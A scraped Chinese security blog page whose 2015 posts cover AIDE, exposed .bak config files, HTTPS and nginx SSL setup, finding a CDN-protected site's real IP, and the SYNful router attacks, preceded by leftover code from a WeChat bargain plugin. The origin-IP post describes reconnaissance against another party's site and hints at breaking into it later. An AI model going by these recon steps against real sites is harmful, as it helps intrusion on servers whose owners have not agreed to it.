                <li><a href="javascript:void(0);" class="a_kanjia_btn">帮砍价</a></li>
                <li><a href="javascript:void(0);" onclick="close_add_box();" class="close">取消</a></li>
            </ul>
        </div>
    </div>
</section>
<section class="duihuan_box clearfix box_hide">
<div class="duihuan_box_main clearfix" style="height: 150px;">
        <div class="duihuan_box_main_msg">商家输入兑换密码</div>
        <form id="dh_form">
            <div class="duihuan_box_main_input">
                <input name="dh_pwd" id="dh_pwd" type="text" placeholder="请输入商品兑换密码">
                <input type="hidden" name="formhash" value="2196e42b">
            </div>
        </form>
        <div class="duihuan_box_main_btn">
            <ul>
                <li><a href="javascript:void(0);" class="a_duihuan_btn">兑换</a></li>
                <li><a href="javascript:void(0);" onclick="close_duihuan_box();" class="close">取消</a></li>
            </ul>
        </div>
    </div>
</section>
<section class="dialog_box clearfix box_hide">
<div class="dialog_box_main clearfix">
        <div class="dialog_box_main_box">
            <div class="dialog_box_main_box_left"><img src="source/plugin/tom_kanjia/images/foutou_ico.png" width="130" height="100"></div>
            <div class="dialog_box_main_box_right"><span class="tt" id="kanjiamsg">成功砍掉了</span><br/><span id="kandiaojiage" class="num">¥0</span></div>
        </div>
        <div class="dialog_box_main_btn clearfix ">
            <a href="javascript:void(0);" onclick="close_dialog_box();">关 闭</a>
        </div>
    </div>
</section>
<script type="text/javascript">
function showShareGuide(){
$('body').append('<section class="top_box clearfix box_hide"><img src=""></section><div id="share_guide_box" onclick="hideShareGuide();" style="position:fixed;z-index:9999999;right:0px;top:0px;width:100%;height:100%;background-color: rgba(0,0,0,0.8);text-align:right;" ontouchmove="return true;" ><img src="source/plugin/tom_kanjia/images/share.png" style="margin-top:10px;margin-right:10px;float: right;"></div>');
}
function hideShareGuide(){
    $("#share_guide_box").remove();
}

function close_dialog_box(){
    $(".dialog_box").addClass('box_hide');
    setTimeout(function(){document.location.reload();},1888);
}

function close_guanzu_box(){
    $(".guanzu_box").addClass('box_hide');
}

function close_add_box(){
    $(".add_box").addClass('box_hide');
}

function show_add_box(){
    $(".add_box").removeClass('box_hide');
}

function close_duihuan_box(){
    $(".duihuan_box").addClass('box_hide');
}

function show_duihuan_box(){
    $(".duihuan_box").removeClass('box_hide');
}

var submintZikanStatus = 0;
$(".a_zikan_btn").click( function () { 
    if(submintZikanStatus == 1){
        return false;
    }
    submintZikanStatus = 1;
    $.ajax({
        type: "GET",
        url: "plugin.php?id=tom_kanjia&mod=ajax&act=zikan&kid=1&uid=660546&formhash=2196e42b",
        dataType : "json",
        data: "",
        success: function(data){
            submintZikanStatus = 0;
            if(data.status == 100) {
                tusi("已经帮砍过了");
                setTimeout(function(){document.location.reload();},1888);
            }else if(data.status == 200){
                $('#kandiaojiage').html(data.price);
                $(".dialog_box").removeClass('box_hide');
            }else{
                tusi("砍价错误");
                setTimeout(function(){document.location.reload();},1888);
            }
        }
    });
});

var submintKanjiaStatus = 0;
$(".a_kanjia_btn").click( function () { 
    var name = $("#name").val();
    var num_count = $("#num_count").val();
    var num_sun = $("#num_sun").val();

    if(submintKanjiaStatus == 1){
        return false;
    }

    if(name == ""){
        tusi("必须填写姓名、昵称");
        return false;
    }
        if(num_sun == "" || num_count != num_sun){
        tusi("数字验证计算错误");
        return false;
    }

    submintKanjiaStatus = 1;
    $.ajax({
        type: "GET",
        url: "plugin.php?id=tom_kanjia&mod=ajax&act=kanjia&kid=1&uid=660546",
        dataType : "json",
        data: $('#kanjia').serialize(),
        success: function(data){
            $(".add_box").addClass('box_hide');
            submintKanjiaStatus = 0;
            if(data.status == 201) {
                tusi("已经帮砍过了");
                setTimeout(function(){document.location.reload();},2888);
            }else if(data.status == 301){
                tusi("不在允许砍价地区");
                setTimeout(function(){document.location.reload();},2888);
            }else if(data.status == 302){
                tusi("你帮砍次数达到限制");
                setTimeout(function(){document.location.reload();},2888);
            }else if(data.status == 200){
                $('#kandiaojiage').html(data.price);
                $(".dialog_box").removeClass('box_hide');
            }else if(data.status == 100){
                $('#kanjiamsg').html("已经最低了");
                $(".dialog_box").removeClass('box_hide');
            }else{
                tusi("砍价错误");
                setTimeout(function(){document.location.reload();},1888);
            }
        }
    });
});

var submintDuihuanStatus = 0;
$(".a_duihuan_btn").click( function () { 
    var dh_pwd = $("#dh_pwd").val();

    if(submintDuihuanStatus == 1){
        return false;
    }

    if(dh_pwd == ""){
        tusi("必须填写兑换密码");
        return false;
    }

    submintDuihuanStatus = 1;
    $.ajax({
        type: "GET",
        url: "plugin.php?id=tom_kanjia&mod=ajax&act=duihuan&kid=1&uid=660546",
        dataType : "json",
        data: $('#dh_form').serialize(),
        success: function(data){
            submintDuihuanStatus = 0;
            if(data.status == 100) {
                tusi("兑换密码错误");
            }else if(data.status == 200){
                $(".duihuan_box").addClass('box_hide');
                tusi("兑换成功");
                setTimeout(function(){document.location.reload();},1888);
            }else{
                tusi("兑换异常,稍等重试");
            }
        }
    });
});

wx.config({
    debug: false,
    appId: '',
    timestamp: 1444651774,
    nonceStr: 'UDdhMFxrwFmWcUTe',
    signature: '127f1c8b81a01f2120eb52421b2f8fde76f25ff7',
    jsApiList: [
      'onMenuShareTimeline',
      'onMenuShareAppMessage'
    ]
});
wx.ready(function () {
    wx.onMenuShareTimeline({
        title: '草泥马正在参加iPhone 6s手机砍价0元购,诚邀你助力,帮我砍一刀!',
        link: 'http://ip6s.wzyhsh.com.cn/wkj/plugin.php?id=tom_kanjia&mod=index&kid=1&uid=660546', 
        imgUrl: 'http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000', 
        success: function () { 
        },
        cancel: function () { 
        }
    });
    wx.onMenuShareAppMessage({
        title: '草泥马正在参加iPhone 6s手机砍价0元购,诚邀你助力,帮我砍一刀!',
        desc: '',
        link: 'http://ip6s.wzyhsh.com.cn/wkj/plugin.php?id=tom_kanjia&mod=index&kid=1&uid=660546',
        imgUrl: 'http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000',
        type: 'link',
        dataUrl: '',
        success: function () { 
        },
        cancel: function () { 
        }
    });
});

var intDiff = parseInt(4209926);
function timer(intDiff){
    window.setInterval(function(){
    var day=0,
        hour=0,
        minute=0,
        second=0;  
    if(intDiff > 0){
        day = Math.floor(intDiff / (60 * 60 * 24));
        hour = Math.floor(intDiff / (60 * 60)) - (day * 24);
        minute = Math.floor(intDiff / 60) - (day * 24 * 60) - (hour * 60);
        second = Math.floor(intDiff) - (day * 24 * 60 * 60) - (hour * 60 * 60) - (minute * 60);
    }
    if (minute <= 9) minute = '0' + minute;
    if (second <= 9) second = '0' + second;
    $('#day_show').html(day+'');
    $('#hour_show').html(hour+'');
    $('#minute_show').html(minute+'');
    $('#second_show').html(second+'');
    intDiff--;
    }, 1000);
} 
$(function(){
    timer(intDiff);
});
</script>
</body>
</html> 



admin 发布于  2015-10-12 20:00 

高级文件系统入侵检测工具-AIDE 安全工具

AIDE(Advanced Intrusion Detection Environment)是一款针对文件和目录进行完整性对比检查的程序,它被开发成Tripwire的一个替代品。

00.jpg

AIDE如何工作

这款工具年纪也不小了,相对来同类工具Tripwire说,它的操作也更加简单。它需要对系统做快照,记录下HASH值,修改时间,以及管理员对文件做的预处理。这个快照可以让管理员建立一个数据库,然后存储到外部设备进行保管。
当管理员想要对系统进行一个完整性检测时,管理员会将之前构建的数据库放置一个当前系统可访问的区域,然后用AIDE将当前系统的状态和数据库进行对比,最后将检测到的当前系统的变更情况报告给管理员。另外,AIDE可以配置为定时运行,利用cron等日程调度技术,每日对系统进行检测报告。
这个系统主要用于运维安全检测,AIDE会向管理员报告系统里所有的恶意更迭情况。

AIDE的特性

支持消息摘要算法:md5, sha1, rmd160, tiger, crc32, sha256, sha512, whirlpool
支持文件属性:文件类型,文件权限,索引节点,UID,GID,链接名称,文件大小,块大小,链接数量,Mtime,Ctime,Atime 
支持Posix ACL,SELinux,XAttrs,扩展文件系统属性
纯文本的配置文件,精简型的数据库
强大的正则表达式,轻松筛选要监视的文件和目录
支持Gzip数据库压缩
独立二进制静态编译的客户端/服务器监控配置

许多Linux发行版里其实也带AIDE的源,你可以输入aptitude install aide直接安装它。
附上Aide 0.15.1的源码下载

原文地址:http://www.darknet.org.uk/2015/09/aide-advanced-intrusion-detection-environment/


admin 发布于  2015-9-21 17:50 

站长切记:请勿将重要配置文件备份为.bak后缀 网络安全

很多站长有这样一个习惯,更改网站配置文件之前将原始文件重命名来备份,例如将config.php重命名为config.php.bak,殊不知这样一个小小的细节就给黑客留下了可乘之机,站长们可以做如下实验:


1、将您网站根目录下任意.php文件重命名为.php.bak,例如将config.php重命名为config.php.bak


2、然后您在浏览器中输入http://你的网站域名/config.php.bak


3、看到没?PHP文件里面所有的信息都显示出来了有没有?或者是可以下载!但是你直接访问 http://你的网站域名/config.php (非入口文件)是看不到里面的代码的!

所以,黑客就利用了站长们这点不好的习惯,对网站的可能的配置文件进行扫描,如下图某网站安全软件拦截信息:00.jpg

确实是这样的,不相信的可以自己测试。当然你还可以测试你想要下载的文件,比如说模板文件,js,等等,这里不多说,请自行摸索。

所以我们在可以修改备份文件名后缀,或者是使用防护软件进行防护。

原文地址:http://blog.ailab.cn/post/129


admin 发布于  2015-9-19 18:54 

浅谈HTTPS链接的重要性和安全性 网络安全

03.png

今天我的一位仁兄被人误导说HTTPS慢,就这个问题我们来浅谈下HTTPS的速度和安全。首先HTTPS是一个优良而且很棒的协议,他为服务器和客户端之间的数据传输提供了强有力的保障。浅谈HTTPS的速度和安全事实证明HTTPS速度是快的。

Mrxn通过实验测试结果证明,HTTPS确实需要CPU来中断SSL连接,这需要的处理能力对于现代计算机而言是小菜一碟了,你会遇到SSL性能瓶颈的可能性完全为0,首屏加载时间与HTTP协议的时间几乎一致。慢,只会在你网络出现问题的时候发生,和SSL/HTTPS毫无干系,或者极有是你的应用程序性能上遇到瓶颈。
HTTPS是一个重要的连接保障
虽然HTTPS并不放之四海而皆准的web安全方案,但是没有它你就不能以策万全。所有的web 安全都倚赖你拥有了HTTPS。如果你没有它,不管对密码做了多强的哈希加密,或者做了多少数据加密,攻击者都可以简单的模拟一个客户端的网络连接,读取它们的安全凭证,极具威胁。此外,证书签名很显然不是一个完美的实践,但每一种浏览器厂商针对认证机构都有相当严格和严谨的规则。要成为一个受到信任的认证机构是非常难的,而且要保持自己良好的信誉也同样是困难的。
HTTPS流量拦截可以避免
本质上讲,可以使自己的客户只去信任真正可用的 SSL 证书,有效的阻挡所有类型的SSL MITM攻击,如果你是要把 SSL 服务部署到一个不受信任的位置,你最应该考虑使用SSL证书。
HTTPS拥有免费的证书服务
国内和国外都提供了免费的基础等级SSL证书,普及了SSL的支持。 一旦让加密的方案上线,你就能够对你的网站和服务进行100%的加密,完全没有任何花费。
HTTP 在私有网络上并不安全
如果一个攻击者获得了对你的任何内部服务的访问权限,所有的HTTP流量都将会被拦截和解读,这就是为什么HTTPS不管是在公共网络还是私有网络都极其重要的原因。如果是把服务部署在AWS上面,就不要想让你的网络流量是私有的了,因为AWS网络就是公共的,这意味着其它的AWS用户都潜在的能够嗅探到你的网络流量。
2015年百度启用HTTPS搜索
在2015年5月,百度也启用了HTTPS安全搜索,并且支持HTTPS站点的积极优先收录,更可以证明,互联网巨头也开始注重网络传输安全了。
总结
如果你正在做网页服务,毫无疑问,你应该使用 HTTPS。它很容易且能获得用户信任,没有理由不用它。作为ICP,作为程序员我们必须要承担起保护用户的重任。
PS:没有经过事实验证的任何说法,不值得我们信任!


admin 发布于  2015-9-17 19:03 

emlog 使用ssl证书开启HTTPS安全访问三步曲 技术文章

02.jpg

最近在研究ssl,所以就给自己得博客使用了ssl,拿自己的博客实战研究ssl,哈哈,废话不说,如果你也想体验一下ssl,那就开始吧:

科普一下(ssl有啥好处呢):参考-浅谈HTTPS链接的重要性和安全性 这篇文章。

ssl传送大概示意图:01.jpg

emlog配置ssl很简单,只需要三步:

第一步:申请ssl证书,学习研究推荐使用免费的ssl证书(如果你是土豪,请无视-_-|),申请教程不写了,没时间,google搜索一大把。

第一个:https://www.startssl.com/ 第二个:https://www.wosign.com/  第一个是英语的,如果看不懂就用第二个国内的,但是国内的只支持sha1算法,国外的可以选择sha2-256位RSA公钥,和4096位的服务器crt身份密钥,更高的加密算法。效果请查看我的网站

申请成功解压之后,文件目录结构如下图所示:

04.png


因为这里我们是用NGINX WEB环境的,所以我们需要解压FOR NGINX.ZIP文件包,然后看到一个CRT一个KEY文件。

第二步、上传和部署SSL证书 A - 把上面的一个CRT一个KEY文件上传到VPS ROOT目录中,然后对应修改成SSL.CRT和SSL.KEY文件名,或者我们用作其他命令都可以。 B - 解密私钥和设置权限

openssl rsa -in ssl.key -out /root/ssl.key
chmod 600 /root/ssl.key

登录SSH,执行上述两行脚本,解密私钥和授权。


第三步、在LNMP环境部署站点SSL设置

我们需要在已有的LNMP添加了站点,然后在站点对应的CONF文件设置。

在"/usr/local/nginx/conf/vhost/"目录文件中,找到对应站点的conf文件,然后修改设置如下

server
{
 listen 80;
 listen 443 ssl;
#listen [::]:80;
ssl on;
        ssl_certificate /root/ssl.crt;
        ssl_certificate_key /root/ssl.key;
server_name mrxn.net mrxn.net;

/root/ssl.crt 是我自己的设置,对应路径我们要与之前上传的CRT和KEY文件路径对应以及文件名不要搞错。

最后,我们重启LNMP,可以看到SSL证书生效,且HTTPS可以访问站点。

06.png


这是在网站所有资源都在本域名下,而且是https 加密安全访问的情况下。一般你一操作完都不是这样的,而是这样的:

05.png

小锁头上面有一个感叹号标志的,如何解决呢:

首先是在后台设置域名地址为:https://mrxn.net 然后,修改 /include/lib/function.base.php ,把头像获取的链接修改成https://开头的:$avatar = "https://cn.gravatar.com/avatar/$hash?s=$s&d=$d&r=$g"; 再回来  数据--更新缓存 之后,打开首页 Ctrl + F5 基本上就是绿色的小箭头了。

如果还没有呢,那多半就是你文章的图片地址是 https://mrxn.net 这样开头的,所以,直接更新数据库的blog表的content和excerpt字段即可:

update emlog_blog set content=replace(content,'https://mrxn.net','https://mrxn.net');
update emlog_blog set excerpt=replace(excerpt,'https://mrxn.net','https://mrxn.net'); 

这样更新完数据库之后,你的网站就基本上全部替换完了非加密连接了(内容页和摘要都更新了,其他的地方貌似没有了,自己写的不算)。
如果我们需要强制使用HTTPS网址访问,那我们就需要取掉 listen 80;脚本。或者是在 listen 80;前面加上# 修改成:#listen 80;

最终修改配置大概如下:

server
    {
        #listen 80;
        listen 443 ssl;
        #listen [::]:80;
        ssl on;
        ssl_certificate 存放ssl证书文件路径.crt;
        ssl_certificate_key 存放ssl证书文件路径.key;
        server_name mrxn.net mrxn.net;
        index index.html index.htm index.php default.html default.htm default.php;
        root  网站存放文件路径;
        keepalive_timeout   60;
       .......此处省略.......
    }
server {
listen 80;
server_name mrxn.net mrxn.net;
return 301 https://mrxn.net$request_uri;
}


注意将域名修改成你自己的域名。至此,基本上就完成了ssl证书的安装,开启https访问了。

相关文章:


一段代码让nginx实现网站资源防盗链

nginx配置location总结及rewrite规则写法

nginx配置ssl加密(单双向认证、部分https)

NginxRewrite规则判断普通用户与搜索引擎爬虫(UA)实现https跳转

SSL/TLS原理详解

OpenSSL 与 SSL 数字证书概念贴

基于OpenSSL自建CA和颁发SSL证书


最后呢,希望有高手带我学习https方面的东西呀,这篇文章呢,也希望对想要使用ssl的童鞋一点帮助,如果哪位看官有更好的方法或者是建议,欢迎留言/评论 不吝赐教啊,我洗耳恭听,多帮忙吧 谢谢。


admin 发布于  2015-9-17 18:45 

如何快速简单地找到使用了CDN加速的网站的真实IP 网络安全

对于一个玩渗透的孩子来说,找到使用了CDN加速的网站的源IP(真实IP),就是第一道门槛啊,没找到源IP就别想其他的环节了。。。。

恰好,今天,我在逛一个常去的网站的时候,挺喜欢的!就简单的做了一个检测。。。已通知管理员 

随手把域名丢进站长工具里面查看了一下,发现使用了CDN,网宿科技的,没怎么听说过,

000021-2015-09-16.jpg

开了好多端口啊。。。21  22 23 1443 3389 不知道是管理员胆子大呢,还是故意是个陷阱。。。暂时不知道

000022-2015-09-16.jpg

为了验证一下是不是真的,那就需要找到源ip地址,几经google,百度 总算有了一点结果,使用 nslookup domain

000023-2015-09-16.jpg

从图中知道,域名加www解析出来的结果有 www.xxx.com。wscdns.com 明显是CDN加速服务器的,去掉www之后,得到了一个IP地址和域名,基本可以确定是源IP地址了,为了进一步验证,在站长网工具箱里面使用同IP网站查询,得到结果如下:

000027-2015-09-16.jpg

唯一域名和IP,80%确定是源IP了。000026-2015-09-16.jpg

根据Kali Linux 上的 whatweb扫描的结果确定源IP就是 图中第一次的结果,因为301跳转到带有 www的域名上,第二次明显为cdn加速服务器的IP,两者的服务器一个为IIS 6.0 一个是IIS 7.5 的,都是ASP_NET 2.5 。

最后来链接服务器测试一下:

000025-2015-09-16.jpg

服务器是Windows server 2003 至于怎么拿下这个Windows server 2003 就是后面的事了(2003_So easy -_-|),信息收集到此就完成了60%,还没对网站进行扫描检测呢。

总结:我测试了自己的博客,发现并不能得到真实的IP地址,因为我的域名都做了cdn加速,所以在此提醒站长朋友们,记得使用cdn加速的时候把所有的二/三/...级域名等等都要做到位,不然很容易得到源IP,如果你的服务器又开放很多端口,就不太安全哦。尽管如此,想要得到源IP的方法还有很多,网上有专门的软件追踪真实IP,善用!我这只是一个简单的傻瓜式方法。。。再见


admin 发布于  2015-9-16 15:59 

黑客大量入侵思科路由器 安全公司:无法抵御 业界新闻

00.jpg


美国互联网安全公司FireEye旗下安全部门Mandiant今日透露,他们发现一种新的针对路由器的攻击手段,允许黑客盗取海量数据,又不会被当前的网络安全防御系统检测到。思科作为全球最大的路由器厂商,首当其冲成为最大的攻击对象。据悉,这种攻击方法能替换思科路由器的操作系统,截至目前,Mandiant已在印度、墨西哥、菲律宾和乌克兰四国发现了14起攻击事件。


思科方面也在第一时间证实其操作系统遭到攻击,并向用户发出警告。同时他们与Mandiant合作,开放解决方案帮助用户检测设备是否收到攻击。


FireEye CEO戴夫·德沃特(Dave DeWalt)称该恶意程序为“SYNful”,从被入侵路由器的计算机日志判断,至少已经存在了一年时间。据悉,SYNful并不是利用路由器的任何软件漏洞,而是盗取有效的网络管理员凭证,对企业发动攻击或获取路由器的访问权。而一旦控制了路由器,就拥有了使用该路由器的企业或政府机构的数据。


德沃特称,目前已发现多个行业和政府及机构的思科路由器被入侵,其他厂商的路由器同样受到攻击。而FireEye则表示,目前的网络安全工具还无法抵御该攻击方式。


思科近段时间以来被安全问题所困扰,其安全设备频频爆出安全问题,而且都是可轻易被攻击者控制。这与思科安全设备存在漏洞有关,思科在很多安全设备和软件中插入默认密钥,即有默认配置的、经过授权的SSH密钥。攻击者一旦获取该SSH密钥,只要与任何一个思科安全设备进行连接,便可利用该漏洞,从而获取root用户访问系统的权限,并对设备进行任意的操作。


看来这次的系统攻击事件与该漏洞可能同样存在关联,而这种影响是不可想象的,因为这意味着思科所有的安全设备都可能受到攻击。思科尽快修补该漏洞才是重中之重。

02.jpg

路由,一个产品传统而概念不断翻新的产品,如果大家有留意的话。大凡大点的公司,都或多或少有出过路由,尤其在今天。究其原因其实非常简单,传统路由推崇的是有线连接,无线连接设备是非常有限的。而智能时代飞速来临的今天,除了传统电脑联网外,越来越多的智能设备需要以无线方式接入网络来提供服务。


admin 发布于  2015-9-15 21:01